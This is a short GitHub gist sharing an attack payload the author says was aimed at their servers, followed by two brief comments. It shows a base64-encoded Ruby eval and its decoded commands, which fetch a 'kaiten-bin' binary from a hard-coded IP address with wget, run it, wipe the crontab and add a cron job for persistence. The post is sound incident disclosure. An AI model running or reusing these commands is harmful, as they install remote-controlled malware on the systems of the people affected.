Skip to content

Instantly share code, notes, and snippets.

@darkhelmet

darkhelmet/hack.rb

Created May 23, 2013 15:38
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save darkhelmet/5636998 to your computer and use it in GitHub Desktop.
Save darkhelmet/5636998 to your computer and use it in GitHub Desktop.
Download ZIP
What this Ukraine hacker was trying to run on our servers.
Raw
hack.rb
# Wanted to eval this
%[c3lzdGVtKCJ3Z2V0IC1PIC92YXIvdG1wL2sgMTg4LjE5MC4xMjQuMTIwL2thaXRlbi1iaW4iKQpzeXN0ZW0oImNobW9kICt4IC92YXIvdG1wL2siKQpzeXN0ZW0oIi92YXIvdG1wL2siKQpzeXN0ZW0oJ2Nyb250YWIgLXInKQpzeXN0ZW0oJyhjcm9udGFiIC1sIDsgZWNobyAiKiAxICogKiAqIHdnZXQgLU8gL3Zhci90bXAvayAxODguMTkwLjEyNC4xMjAva2FpdGVuLWJpbiAmJiBjaG1vZCAreCAvdmFyL3RtcC9rICYmIC92YXIvdG1wL2siKSB8IGNyb250YWIgLScp].unpack(%[m0])[0]
# Which would run this
system("wget -O /var/tmp/k 188.190.124.120/kaiten-bin")
system("chmod +x /var/tmp/k")
system("/var/tmp/k")
system('crontab -r')
system('(crontab -l ; echo \"* 1 * * * wget -O /var/tmp/k 188.190.124.120/kaiten-bin && chmod +x /var/tmp/k && /var/tmp/k\") | crontab -')
@uxp
Copy link

uxp commented May 23, 2013

aw, 404.

@darkhelmet
Copy link
Author

Yeah, sadness ensued.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment